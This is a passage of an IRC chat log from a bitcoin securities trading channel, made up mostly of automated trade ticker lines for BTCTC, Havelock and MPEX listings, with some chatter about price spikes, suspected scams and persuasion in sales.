BTC [-] Aug 26 21:32:34 [BTCTC] [LABCOIN] 50 @ 0.003381 = 0.1691 BTC [-] Aug 26 21:32:35 [BTCTC] [LABCOIN] 200 @ 0.003381 = 0.6762 BTC [-] Aug 26 21:32:37 [BTCTC] [LABCOIN] 2000 @ 0.00338 = 6.76 BTC [-] Aug 26 21:32:38 [BTCTC] [LABCOIN] 2551 @ 0.003373 = 8.6045 BTC [-] Aug 26 21:33:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02852 = 0.1426 BTC [-] Aug 26 21:33:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.02852 = 0.4278 BTC [-] Aug 26 21:36:51 [HAVELOCK] [AM100] 5 @ 0.0282 = 0.141 BTC [-] Aug 26 21:37:14 weeeel, it seems that this is an issue with where i poll some data :/ Aug 26 21:39:10 [BTCTC] [ACTIVEMINING] 50 @ 0.005191 = 0.2596 BTC [-] Aug 26 21:39:18 [BTCTC] [DMS.MINING] 1 @ 0.003674 BTC [+] Aug 26 21:40:00 [BTCTC] [ACTIVEMINING] 87 @ 0.00519 = 0.4515 BTC [-] Aug 26 21:42:05 [BTCTC] [ACTIVEMINING] 72 @ 0.00519 = 0.3737 BTC [-] Aug 26 21:44:08 [BTCTC] [ACTIVEMINING] 25 @ 0.00519 = 0.1298 BTC [-] Aug 26 21:44:09 sweet Aug 26 21:44:31 switched polling locations, didn't have to update anything but a url :D Aug 26 21:45:18 [BTCTC] [NASTY-PT] 10 @ 0.002279 = 0.0228 BTC [+] Aug 26 21:45:35 [HAVELOCK] [AM100] 1 @ 0.0287 BTC [+] Aug 26 21:53:00 [BTCTC] [DMS.PURCHASE] 3 @ 0.01605 = 0.0482 BTC [-] Aug 26 21:53:14 [BTCTC] [ACTIVEMINING] 348 @ 0.00519 = 1.8061 BTC [-] Aug 26 21:55:46 http://www.droid-life.com/2013/08/22/newest-google-patent-application-secures-your-phone-depending-on-where-you-are/ Aug 26 21:55:49 Newest Google Patent Application Secures Your Phone Depending on Where You Are – Droid Life Aug 26 21:58:44 [BTCTC] [ASICMINER-PT] 1 @ 2.922 BTC [+] Aug 26 21:59:42 ! Aug 26 22:03:55 [BTCTC] [LABCOIN] 10 @ 0.00342 = 0.0342 BTC [+] Aug 26 22:04:01 [MPEX] [S.MPOE] 4150 @ 0.00086118 = 3.5739 BTC [-] Aug 26 22:05:59 [BTCTC] [LABCOIN] 10 @ 0.00342 = 0.0342 BTC [+] Aug 26 22:06:17 [BTCTC] [HOSTED-MINING] 280 @ 0.002799 = 0.7837 BTC [+] Aug 26 22:06:18 [BTCTC] [HOSTED-MINING] 12170 @ 0.0028 = 34.076 BTC [+] Aug 26 22:06:41 [BTCTC] [LABCOIN] 10 @ 0.00342 = 0.0342 BTC [+] Aug 26 22:06:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.02866 = 0.0573 BTC [+] Aug 26 22:06:51 [BTCTC] [LABCOIN] 10 @ 0.00342 = 0.0342 BTC [+] Aug 26 22:09:47 [HAVELOCK] [VTX] 3 @ 0.6 = 1.8 BTC [+] Aug 26 22:09:59 [BTCTC] [LABCOIN] 165 @ 0.003492 = 0.5762 BTC [+] Aug 26 22:10:19 [BTCTC] [LABCOIN] 29 @ 0.003494 = 0.1013 BTC [+] Aug 26 22:14:54 [MPEX] [S.MPOE] 225 @ 0.00086118 = 0.1938 BTC [-] Aug 26 22:14:56 [MPEX] [S.MPOE] 4600 @ 0.00086026 = 3.9572 BTC [-] Aug 26 22:15:01 [MPEX] [S.MPOE] 3875 @ 0.00086022 = 3.3334 BTC [-] Aug 26 22:22:28 [BTCTC] [LABCOIN] 20 @ 0.003481 = 0.0696 BTC [-] Aug 26 22:22:29 [BTCTC] [LABCOIN] 10 @ 0.003481 = 0.0348 BTC [-] Aug 26 22:22:30 [BTCTC] [LABCOIN] 20 @ 0.003482 = 0.0696 BTC [+] Aug 26 22:22:32 [BTCTC] [LABCOIN] 230 @ 0.003487 = 0.802 BTC [+] Aug 26 22:24:12 [BTCTC] [LABCOIN] 6 @ 0.003484 = 0.0209 BTC [-] Aug 26 22:24:29 [BTCTC] [HOSTED-MINING] 1 @ 0.0028 BTC [+] Aug 26 22:25:32 [MPEX] [S.MPOE] 4283 @ 0.00086022 = 3.6843 BTC [-] Aug 26 22:25:34 [MPEX] [S.MPOE] 5667 @ 0.00085984 = 4.8727 BTC [-] Aug 26 22:25:38 [BTCTC] [DMS.MINING] 29 @ 0.003674 = 0.1065 BTC [+] Aug 26 22:27:57 [BTCTC] [DMS.MINING] 45 @ 0.003674 = 0.1653 BTC [+] Aug 26 22:29:08 [BTCTC] [DMS.MINING] 2 @ 0.003674 = 0.0073 BTC [+] Aug 26 22:29:10 [BTCTC] [DMS.MINING] 50 @ 0.003676 = 0.1838 BTC [+] Aug 26 22:29:11 [BTCTC] [DMS.MINING] 60 @ 0.003677 = 0.2206 BTC [+] Aug 26 22:33:19 what's going on with labcoin? Aug 26 22:33:28 whatcha mean Aug 26 22:33:34 why is it up? Aug 26 22:33:43 news of news Aug 26 22:33:49 aha.... Aug 26 22:33:58 doesnt make sense i know Aug 26 22:34:18 seems like insider info Aug 26 22:34:31 it happens all the time Aug 26 22:34:37 what happens? Aug 26 22:34:50 spike up because of news of news? Aug 26 22:34:55 yes Aug 26 22:35:01 hmm Aug 26 22:35:10 People buy in hopes of an even larger buy up Aug 26 22:35:16 perhaps asic miner should of done the same thing Aug 26 22:35:29 AM is just doing their thing Aug 26 22:35:36 aka working Aug 26 22:35:55 which brings up a question... What's the symbol for active mining and asic miner? Aug 26 22:36:01 ActM Aug 26 22:36:02 seems like people use AM for both Aug 26 22:36:03 and AM Aug 26 22:36:09 ah Aug 26 22:36:11 thanks for that Aug 26 22:36:19 do what I can Aug 26 22:36:29 wait till Namworld realizes on his threat Aug 26 22:36:40 and ipoes AsicMania Aug 26 22:36:47 :D Aug 26 22:37:00 lol Aug 26 22:37:49 well. just got offer to provide some shares as IDIFF collateral Aug 26 22:37:56 now am deciding how to set the terms Aug 26 22:38:26 whether to enable myself to short them :P Aug 26 22:39:52 or use options instead Aug 26 22:40:26 bah, short all that crap Aug 26 22:44:50 does btct provide reliable 24h price? i don't want to use last for valuation Aug 26 22:45:26 how do you mean Aug 26 22:47:19 we need to determine exactly how many shares i'm to return after IDIFF is paid Aug 26 22:47:28 Ah Aug 26 22:47:30 and spot price can be manipulated Aug 26 22:50:21 Ah well wish I could help you there, but I don't want to be misleading. Aug 26 22:51:42 if i wanted to avoid ppl misleading/trolling me i'd not be muttering here Aug 26 22:52:48 Basically I'm just saying after looking into it, I can't advise one or another :) Aug 26 22:52:54 one way* Aug 26 22:54:18 ;;nethash Aug 26 22:54:19 524443.323731 Aug 26 23:30:05 [HAVELOCK] [CFIG] 2 @ 0.1245 = 0.249 BTC [+] Aug 26 23:30:08 [HAVELOCK] [CFIG] 2 @ 0.121 = 0.242 BTC [-] Aug 26 23:32:37 [HAVELOCK] [XBOND] 400 @ 0.00116 = 0.464 BTC [-] Aug 26 23:33:56 jurov: the numbers are absolutely correct, avg is vwap Aug 26 23:34:16 [HAVELOCK] [XBOND] 20 @ 0.00116 = 0.0232 BTC [-] Aug 26 23:34:40 which brings up a question... What's the symbol for active mining and asic miner? Aug 26 23:34:50 thats the first red flag really Aug 26 23:35:00 scam tactics 101 Aug 26 23:35:37 [BTCTC] [MININGCO.ETF] 20 @ 0.11 = 2.2 BTC [-] Aug 26 23:35:39 [BTCTC] [MININGCO.ETF] 15 @ 0.105 = 1.575 BTC [-] Aug 26 23:35:39 create ambiguity between your scam and a succesful incumbent Aug 26 23:39:09 scam tactics? lol. Aug 26 23:39:17 [HAVELOCK] [SDSTM] 5 @ 0.0044 = 0.022 BTC [+] Aug 26 23:39:20 .d Aug 26 23:39:22 65750060.14908 | Next Diff in 1653 blocks | Estimated Change: 10.5881% in 10d 6h 14m 25s Aug 26 23:39:28 ;;nethash Aug 26 23:39:29 524443.323731 Aug 26 23:39:33 i see Aug 26 23:39:38 [BTCTC] [MININGCO.ETF] 6 @ 0.1001 = 0.6006 BTC [-] Aug 26 23:41:42 [HAVELOCK] [XBOND] 125 @ 0.00116 = 0.145 BTC [-] Aug 26 23:42:01 [HAVELOCK] [SDSTM] 3 @ 0.0045 = 0.0135 BTC [+] Aug 26 23:42:24 [MPEX] [S.MPOE] 5000 @ 0.00086383 = 4.3192 BTC [+] Aug 26 23:43:18 [HAVELOCK] [LABCO] 30 @ 0.0028001 = 0.084 BTC [-] Aug 26 23:44:09 [HAVELOCK] [SMG] 138 @ 0.000245 = 0.0338 BTC [+] Aug 26 23:44:20 [HAVELOCK] [SMG] 200 @ 0.000245 = 0.049 BTC [+] Aug 26 23:44:59 [HAVELOCK] [SMG] 12 @ 0.000245 = 0.0029 BTC [+] Aug 26 23:45:22 dexX7: ok, thanks Aug 26 23:46:51 oh wow Aug 26 23:46:56 ;;calc 0.01606 - ((5000000 * 25 * 86400 * (65535/(2**48))/((65750060.14908 * .4) + 65750060.14908)) * 410) Aug 26 23:46:56 0.00486002807661 Aug 26 23:48:15 [HAVELOCK] [CFIG] 1 @ 0.1215 BTC [+] Aug 26 23:49:05 [HAVELOCK] [SMG] 5 @ 0.000245 = 0.0012 BTC [+] Aug 26 23:49:19 [HAVELOCK] [SMG] 45 @ 0.000245 = 0.011 BTC [+] Aug 26 23:50:39 [HAVELOCK] [XBOND] 19 @ 0.00116 = 0.022 BTC [-] Aug 26 23:50:59 [HAVELOCK] [SMG] 8 @ 0.000245 = 0.002 BTC [+] Aug 26 23:51:08 [HAVELOCK] [SMG] 316 @ 0.0002479 = 0.0783 BTC [+] Aug 26 23:53:07 [HAVELOCK] [CFIG] 1 @ 0.1215 BTC [+] Aug 26 23:53:13 [HAVELOCK] [CFIG] 2 @ 0.121 = 0.242 BTC [-] Aug 26 23:54:45 [HAVELOCK] [XBOND] 200 @ 0.00116 = 0.232 BTC [-] Aug 26 23:56:08 [BTCTC] [LABCOIN] 1 @ 0.003401 BTC [-] Aug 26 23:57:09 [MPEX] [S.MPOE] 921 @ 0.00086374 = 0.7955 BTC [-] Aug 26 23:58:12 [HAVELOCK] [SMG] 311 @ 0.0002479 = 0.0771 BTC [+] Aug 26 23:58:37 [BTCTC] [ACTIVEMINING] 1000 @ 0.0052 = 5.2 BTC [+] Aug 26 23:58:39 [HAVELOCK] [SMG] 165 @ 0.000248 = 0.0409 BTC [+] Aug 26 23:58:41 [BTCTC] [ACTIVEMINING] 10 @ 0.0052 = 0.052 BTC [+] Aug 27 00:00:12 [BTCTC] [LABCOIN] 19 @ 0.003401 = 0.0646 BTC [-] Aug 27 00:00:13 [BTCTC] [LABCOIN] 50 @ 0.003401 = 0.1701 BTC [-] Aug 27 00:00:15 [BTCTC] [LABCOIN] 75 @ 0.0034 = 0.255 BTC [-] Aug 27 00:01:24 [BTCTC] [DMS.SELLING] 3 @ 0.0123 = 0.0369 BTC [+] Aug 27 00:02:36 [BTCTC] [ACTIVEMINING] 1000 @ 0.0052 = 5.2 BTC [+] Aug 27 00:09:36 [BTCTC] [DMS.MINING] 1 @ 0.003777 BTC [+] Aug 27 00:13:53 mircea_popescu: http://www.psmag.com/politics/why-even-your-best-arguments-never-work-64910/ why everyone hates the girl Aug 27 00:15:35 kakobrekla: thanks again for pointing out that error on meh site :) Aug 27 00:17:02 welcome Aug 27 00:19:27 mircea_popescu: http://www.psmag.com/politics/why-even-your-best-arguments-never-work-64910/ why everyone hates the girl <<< wait, so calling everyone an idiot doesn't work? Aug 27 00:20:07 [HAVELOCK] [AM100] 14 @ 0.02788 = 0.3903 BTC [-] Aug 27 00:20:08 actually, depends on what is the goal Aug 27 00:20:15 and who is the idiot Aug 27 00:27:17 [BTCTC] [LABCOIN] 1 @ 0.003422 BTC [+] Aug 27 00:28:49 [BTCTC] [LABCOIN] 1 @ 0.003423 BTC [+] Aug 27 00:28:49 [BTCTC] [LABCOIN] 5 @ 0.003423 = 0.0171 BTC [+] Aug 27 00:28:49 [BTCTC] [LABCOIN] 3 @ 0.003422 = 0.0103 BTC [-] Aug 27 00:29:16 mpoe-pr is actually trolling idiots into taking stronger stances on dumber projects so that more humans can be soaked for greater sums Aug 27 00:29:24 brilliant Aug 27 00:29:30 i finally get it Aug 27 00:30:09 >In the last days I've received next part of funds from Bitalo, next payments will commence shortly. I have a bit of backlog with refunds recently, due to concentrating my work on shipping Bitalo in september, because that is critical for having sustainable income to be able to repay the remaining funds. All refunds will be processed normally though, no worries here. I will make a separate update on Bitmarket.eu when this is complete. Aug 27 00:30:13 lolz srs. Aug 27 00:30:39 [the dude who put clients money in bitcoinica and ofc lost it all] Aug 27 00:31:05 and people calmly watch it. Aug 27 00:31:15 braindead. Aug 27 00:32:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02891 = 0.0867 BTC [+] Aug 27 00:32:38 [HAVELOCK] [AM100] 5 @ 0.0281 = 0.1405 BTC [+] Aug 27 00:32:53 [HAVELOCK] [AM100] 10 @ 0.0281 = 0.281 BTC [+] Aug 27 00:33:00 [HAVELOCK] [AM100] 20 @ 0.0281 = 0.562 BTC [+] Aug 27 00:33:16 [HAVELOCK] [AM100] 14 @ 0.0281 = 0.3934 BTC [+] Aug 27 00:33:25 the question is, what brain thing happens to make a person think that admitting they believed idiotic things is a bad development, and that protecting their idiocy somehow makes them not an idiot Aug 27 00:33:30 [BTCTC] [LABCOIN] 3 @ 0.003421 = 0.0103 BTC [-] Aug 27 00:33:37 [HAVELOCK] [AM100] 4 @ 0.0287 = 0.1148 BTC [+] Aug 27 00:33:40 where does this value for delusion come from Aug 27 00:33:44 laziness? Aug 27 00:34:05 vanity? Aug 27 00:34:12 It comes from idiocy Aug 27 00:34:23 arrogance. Aug 27 00:34:37 "i was wrong and i learned a thing" Aug 27 00:34:50 aint sohard Aug 27 00:35:58 i like kako's answer I think Aug 27 00:36:07 [BTCTC] [HOSTED-MINING] 4 @ 0.0028 = 0.0112 BTC [+] Aug 27 00:36:49 and what makes arrogance valued? Aug 27 00:37:06 plz don't say idiocy Aug 27 00:37:08 hehe Aug 27 00:37:20 cargo cult entrepreneurship Aug 27 00:37:55 [BTCTC] [LABCOIN] 20 @ 0.003416 = 0.0683 BTC [-] Aug 27 00:37:56 [BTCTC] [LABCOIN] 1 @ 0.003418 BTC [+] Aug 27 00:37:57 [BTCTC] [LABCOIN] 3 @ 0.003422 = 0.0103 BTC [+] Aug 27 00:38:34 [BTCTC] [LABCOIN] 6 @ 0.00349 = 0.0209 BTC [+] Aug 27 00:40:01 [BTCTC] [TAT.MINIGAME] 1 @ 0.00022 BTC [-] Aug 27 00:42:06 [BTCTC] [BTC-GROWTH] 1 @ 0.1005 BTC [+] Aug 27 00:45:28 [HAVELOCK] [SDSTM] 22 @ 0.0045 = 0.099 BTC [+] Aug 27 00:45:58 As an aside, if you are using tactics to cater to the intricacies of a person like this, like using affirmation to get them to consider your position, is this even a debate or persuasive conversation at all? Does it not turn into you developing and utilizing skills in manipulation (salesmanship), and thus displace you from having to prove your case at all? Aug 27 00:46:59 this is something i eventually had to deal with with my clients, where eventually i was no longer making a case for my services, but catering to their own psychology to make them "feel" okay with working with me Aug 27 00:47:32 [BTCTC] [TAT.ASICMINER] 14 @ 0.02834 = 0.3968 BTC [-] Aug 27 00:47:41 as time passed i felt more like a manipulative psychologist than a salesman or service provider Aug 27 00:48:49 well... go to business where you don't have to interact with NPCs Aug 27 00:49:20 and i think the delusion is learned in school, teachers are extremely reluctant to admit error (not even failure) Aug 27 00:50:28 i suppose a teacher is trying to protect their own authority in he classroom Aug 27 00:50:43 maybe they need two teachers per room, one to teach you and one to whip you Aug 27 00:51:32 [BTCTC] [RSM] 14 @ 0.0135 = 0.189 BTC [+] Aug 27 00:52:11 on my whiteboard by the meeting table always read "The bait must suit the fish, not the angler." Clients loved it. Aug 27 00:52:27 the irony was lost however Aug 27 00:55:59 good clients are hard to come by. Aug 27 00:56:05 how do you get yours? Aug 27 00:56:58 only dead fish go with the flow Aug 27 00:57:56 [BTCTC] [HOSTED-MINING] 10 @ 0.0028 = 0.028 BTC [+] Aug 27 00:58:41 [BTCTC] [HOSTED-MINING] 30 @ 0.0028 = 0.084 BTC [+] Aug 27 01:04:22 [BTCTC] [ACTIVEMINING] 1 @ 0.005298 BTC [+] Aug 27 01:04:24 [BTCTC] [ACTIVEMINING] 9 @ 0.0052 = 0.0468 BTC [-] Aug 27 01:04:46 [HAVELOCK] [XBOND] 3 @ 0.00116 = 0.0035 BTC [-] Aug 27 01:05:10 [BTCTC] [LABCOIN] 1 @ 0.003428 BTC [-] Aug 27 01:11:04 for your amusement: Aug 27 01:11:19 http://www.thebitcoinacademy.com/ Aug 27 01:11:22 LIVE CHAT Aug 27 01:11:54 [HAVELOCK] [AM100] 1 @ 0.0287 BTC [+] Aug 27 01:12:51 sharing that address: Aug 27 01:12:52 http://nationwidecomputertechs.net/res/1014/paradigm-concepts-llc.html Aug 27 01:12:55 Oregon / Beaverton / Paradigm Concepts LLC Aug 27 01:13:16 [BTCTC] [DMS.SELLING] 30 @ 0.01249 = 0.3747 BTC [+] Aug 27 01:13:17 [BTCTC] [DMS.SELLING] 100 @ 0.0126 = 1.26 BTC [+] Aug 27 01:13:18 [BTCTC] [DMS.SELLING] 53 @ 0.01266 = 0.671 BTC [+] Aug 27 01:13:26 So, CFIG's remainder IPO shares disappeared this evening. Nothing shown on the market, even though they're post IPO... Aug 27 01:13:27 We need tablets, WiFi routers, bitcoin mining rigs, wiring, solar panels, batteries, pencils, books, paper, printers, chairs, markers, chalkboards, lunches, coursework creation, teachers, educators, traders, business owners, flyers, stickers, student IDs, even bus passes to get to school and much much more. Aug 27 01:13:38 [BTCTC] [DMS.SELLING] 3 @ 0.01266 = 0.038 BTC [+] Aug 27 01:13:39 [BTCTC] [DMS.MINING] 3 @ 0.003671 = 0.011 BTC [-] Aug 27 01:13:41 [BTCTC] [DMS.PURCHASE] 3 @ 0.01605 = 0.0482 BTC [-] Aug 27 01:13:47 school buses ftw Aug 27 01:14:17 also related off the bitcoin kinetics key Aug 27 01:14:18 http://btcwtf.com/ Aug 27 01:14:20 [BTCTC] [DMS.SELLING] 8 @ 0.01266 = 0.1013 BTC [+] Aug 27 01:14:21 Bitcoin Kinetics Aug 27 01:14:21 [BTCTC] [DMS.MINING] 8 @ 0.00367 = 0.0294 BTC [-] Aug 27 01:14:23 [BTCTC] [DMS.PURCHASE] 8 @ 0.01605 = 0.1284 BTC [-] Aug 27 01:14:25 and appropriately named Aug 27 01:15:02 [BTCTC] [DMS.SELLING] 50 @ 0.01266 = 0.633 BTC [+] Aug 27 01:15:05 [BTCTC] [DMS.MINING] 50 @ 0.00355 = 0.1775 BTC [-] Aug 27 01:15:11 [BTCTC] [DMS.PURCHASE] 50 @ 0.01605 = 0.8025 BTC [-] Aug 27 01:16:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.02839 = 0.4259 BTC [+] Aug 27 01:18:58 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001129 = 0.0023 BTC [+] Aug 27 01:26:47 [HAVELOCK] [AM100] 1 @ 0.02788 BTC [-] Aug 27 01:26:49 [BTCTC] [LABCOIN] 4 @ 0.003415 = 0.0137 BTC [-] Aug 27 01:26:49 [BTCTC] [LABCOIN] 10 @ 0.003416 = 0.0342 BTC [+] Aug 27 01:26:51 [HAVELOCK] [AM100] 10 @ 0.0278 = 0.278 BTC [-] Aug 27 01:26:56 [HAVELOCK] [AM100] 77 @ 0.0277001 = 2.1329 BTC [-] Aug 27 01:27:01 [HAVELOCK] [AM100] 77 @ 0.0276002 = 2.1252 BTC [-] Aug 27 01:27:03 [HAVELOCK] [AM100] 140 @ 0.02760001 = 3.864 BTC [-] Aug 27 01:27:52 [HAVELOCK] [AM100] 20 @ 0.02760001 = 0.552 BTC [-] Aug 27 01:29:18 [HAVELOCK] [CFIG] 50 @ 0.14 = 7 BTC [+] Aug 27 01:31:36 [HAVELOCK] [CFIG] 1 @ 0.147999 BTC [+] Aug 27 01:31:50 [HAVELOCK] [CFIG] 9 @ 0.148 = 1.332 BTC [+] Aug 27 01:34:52 [BTCTC] [KENILWORTH] 5 @ 0.0018 = 0.009 BTC [+] Aug 27 01:36:59 [MPEX] [S.MPOE] 3558 @ 0.0008615 = 3.0652 BTC [-] Aug 27 01:37:02 [MPEX] [S.MPOE] 179 @ 0.00086374 = 0.1546 BTC [+] Aug 27 01:40:18 [HAVELOCK] [CFIG] 10 @ 0.1497 = 1.497 BTC [+] Aug 27 01:40:30 [HAVELOCK] [CFIG] 3 @ 0.1497999 = 0.4494 BTC [+] Aug 27 01:40:55 [HAVELOCK] [CFIG] 1 @ 0.1497999 BTC [+] Aug 27 01:41:16 [HAVELOCK] [AM100] 77 @ 0.0276002 = 2.1252 BTC [+] Aug 27 01:41:38 http://i.imgur.com/AeSgLjr.jpg Aug 27 01:41:50 [HAVELOCK] [CFIG] 14 @ 0.1497999 = 2.0972 BTC [+] Aug 27 01:42:28 [HAVELOCK] [AM100] 57 @ 0.02760001 = 1.5732 BTC [-] Aug 27 01:43:17 [HAVELOCK] [CFIG] 10 @ 0.1497999 = 1.498 BTC [+] Aug 27 01:43:22 [HAVELOCK] [CFIG] 1 @ 0.1497999 BTC [+] Aug 27 01:44:08 [HAVELOCK] [AM100] 200 @ 0.0276 = 5.52 BTC [-] Aug 27 01:44:17 [HAVELOCK] [CFIG] 4 @ 0.1497999 = 0.5992 BTC [+] Aug 27 01:44:40 [MPEX] [S.MPOE] 7180 @ 0.00086387 = 6.2026 BTC [+] Aug 27 01:44:50 [HAVELOCK] [CFIG] 32 @ 0.1498 = 4.7936 BTC [+] Aug 27 01:46:29 [BTCTC] [BTC-TRADING-PT] 1 @ 1.07 BTC [-] Aug 27 01:48:32 [BTCTC] [ASICMINER-PT] 1 @ 2.914 BTC [+] Aug 27 01:48:40 [BTCTC] [LABCOIN] 200 @ 0.0034 = 0.68 BTC [-] Aug 27 01:51:15 [BTCTC] [HOSTED-MINING] 40 @ 0.0028 = 0.112 BTC [+] Aug 27 01:55:55 [HAVELOCK] [AM100] 100 @ 0.0276 = 2.76 BTC [-] Aug 27 01:56:19 [BTCTC] [TAT.VIRTUALMINE] 60 @ 0.001129 = 0.0677 BTC [+] Aug 27 02:03:59 [MPEX] [S.MPOE] 7100 @ 0.00086394 = 6.134 BTC [+] Aug 27 02:04:07 [MPEX] [S.MPOE] 2183 @ 0.00086428 = 1.8867 BTC [+] Aug 27 02:04:55 [BTCTC] [DMS.SELLING] 20 @ 0.01266 = 0.2532 BTC [+] Aug 27 02:04:57 [BTCTC] [DMS.MINING] 20 @ 0.003501 = 0.07 BTC [-] Aug 27 02:04:59 [BTCTC] [DMS.PURCHASE] 20 @ 0.01605 = 0.321 BTC [-] Aug 27 02:05:03 [HAVELOCK] [CFIG] 50 @ 0.149 = 7.45 BTC [-] Aug 27 02:05:05 [HAVELOCK] [CFIG] 3 @ 0.1498 = 0.4494 BTC [+] Aug 27 02:05:12 [BTCTC] [DMS.PURCHASE] 150 @ 0.01605 = 2.4075 BTC [-] Aug 27 02:09:19 [HAVELOCK] [AM100] 3 @ 0.02733 = 0.082 BTC [-] Aug 27 02:12:53 [MPEX] [S.MPOE] 128 @ 0.00086387 = 0.1106 BTC [-] Aug 27 02:12:55 [MPEX] [S.MPOE] 700 @ 0.00086 = 0.602 BTC [-] Aug 27 02:12:59 [MPEX] [S.MPOE] 769 @ 0.00085984 = 0.6612 BTC [-] Aug 27 02:13:11 [MPEX] [S.MPOE] 1903 @ 0.00085705 = 1.631 BTC [-] Aug 27 02:14:05 [BTCTC] [DMS.PURCHASE] 15 @ 0.01605 = 0.2408 BTC [-] Aug 27 02:15:31 [BTCTC] [ASICMINER-PT] 1 @ 2.819 BTC [-] Aug 27 02:15:32 [BTCTC] [ASICMINER-PT] 1 @ 2.819 BTC [-] Aug 27 02:15:34 [BTCTC] [ASICMINER-PT] 1 @ 2.816 BTC [-] Aug 27 02:17:08 nice Aug 27 02:18:04 nice? Aug 27 02:22:02 [HAVELOCK] [AM100] 10 @ 0.02732 = 0.2732 BTC [-] Aug 27 02:22:04 [HAVELOCK] [AM100] 100 @ 0.02731 = 2.731 BTC [-] Aug 27 02:22:07 [HAVELOCK] [AM100] 290 @ 0.0273 = 7.917 BTC [-] Aug 27 02:32:26 [BTCTC] [DMS.PURCHASE] 20 @ 0.01605 = 0.321 BTC [-] Aug 27 02:35:16 [BTCTC] [DMS.SELLING] 45 @ 0.01266 = 0.5697 BTC [+] Aug 27 02:36:15 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:37:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.02864 = 0.2864 BTC [+] Aug 27 02:37:57 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:38:16 [BTCTC] [DMS.SELLING] 99 @ 0.01266 = 1.2533 BTC [+] Aug 27 02:39:22 [BTCTC] [DMS.PURCHASE] 20 @ 0.01605 = 0.321 BTC [-] Aug 27 02:39:57 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:40:27 [BTCTC] [DMS.SELLING] 40 @ 0.01266 = 0.5064 BTC [+] Aug 27 02:42:00 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:43:57 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:50:23 [HAVELOCK] [CFIG] 334 @ 0.15 = 50.1 BTC [+] Aug 27 02:51:39 [HAVELOCK] [AM100] 10 @ 0.0273 = 0.273 BTC [-] Aug 27 02:51:45 [HAVELOCK] [AM100] 15 @ 0.0266 = 0.399 BTC [-] Aug 27 02:51:49 [HAVELOCK] [AM100] 10 @ 0.0266 = 0.266 BTC [-] Aug 27 02:51:53 [HAVELOCK] [AM100] 42 @ 0.0265 = 1.113 BTC [-] Aug 27 02:51:56 [BTCTC] [LABCOIN] 4 @ 0.003399 = 0.0136 BTC [-] Aug 27 02:51:59 [HAVELOCK] [AM100] 50 @ 0.02625 = 1.3125 BTC [-] Aug 27 02:52:24 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC [+] Aug 27 02:52:34 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC [+] Aug 27 02:52:51 [BTCTC] [LABCOIN] 8 @ 0.003399 = 0.0272 BTC [-] Aug 27 02:53:25 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC [+] Aug 27 02:53:45 [HAVELOCK] [CFIG] 1 @ 0.15 BTC [+] Aug 27 02:53:55 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:54:02 [HAVELOCK] [AM100] 2 @ 0.02600001 = 0.052 BTC [-] Aug 27 02:54:06 [HAVELOCK] [AM100] 25 @ 0.02600001 = 0.65 BTC [-] Aug 27 02:54:12 [HAVELOCK] [AM100] 15 @ 0.0259 = 0.3885 BTC [-] Aug 27 02:54:17 [HAVELOCK] [AM100] 2 @ 0.02565 = 0.0513 BTC [-] Aug 27 02:54:21 [HAVELOCK] [AM100] 3 @ 0.0256 = 0.0768 BTC [-] Aug 27 02:54:25 [HAVELOCK] [AM100] 10 @ 0.02541 = 0.2541 BTC [-] Aug 27 02:54:29 [HAVELOCK] [AM100] 108 @ 0.0254 = 2.7432 BTC [-] Aug 27 02:54:48 [HAVELOCK] [CFIG] 28 @ 0.15 = 4.2 BTC [+] Aug 27 02:55:57 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:55:59 [HAVELOCK] [AM100] 2 @ 0.0253 = 0.0506 BTC [-] Aug 27 02:56:03 [HAVELOCK] [AM100] 22 @ 0.0253 = 0.5566 BTC [-] Aug 27 02:56:09 [HAVELOCK] [AM100] 10 @ 0.02500031 = 0.25 BTC [-] Aug 27 02:56:13 [HAVELOCK] [AM100] 40 @ 0.025 = 1 BTC [-] Aug 27 02:56:25 [HAVELOCK] [CFIG] 12 @ 0.15 = 1.8 BTC [+] Aug 27 02:57:55 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 02:59:56 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 03:00:34 [HAVELOCK] [CFIG] 247 @ 0.15 = 37.05 BTC [+] Aug 27 03:01:36 [HAVELOCK] [CFIG] 33 @ 0.15 = 4.95 BTC [+] Aug 27 03:01:57 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 03:03:56 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 03:05:57 [BTCTC] [LABCOIN] 12 @ 0.003399 = 0.0408 BTC [-] Aug 27 03:06:56 [BTCTC] [LABCOIN] 50 @ 0.0034 = 0.17 BTC [+] Aug 27 03:07:45 [BTCTC] [ACTIVEMINING] 1 @ 0.005299 BTC [+] Aug 27 03:11:35 [BTCTC] [LABCOIN] 20 @ 0.003479 = 0.0696 BTC [+] Aug 27 03:11:37 [BTCTC] [LABCOIN] 16 @ 0.00348 = 0.0557 BTC [+] Aug 27 03:11:38 [BTCTC] [LABCOIN] 20 @ 0.003481 = 0.0696 BTC [+] Aug 27 03:11:39 [BTCTC] [LABCOIN] 219 @ 0.003485 = 0.7632 BTC [+] Aug 27 03:11:40 [BTCTC] [LABCOIN] 100 @ 0.003486 = 0.3486 BTC [+] Aug 27 03:11:41 [BTCTC] [LABCOIN] 777 @ 0.003488 = 2.7102 BTC [+] Aug 27 03:11:42 [BTCTC] [LABCOIN] 31 @ 0.003489 = 0.1082 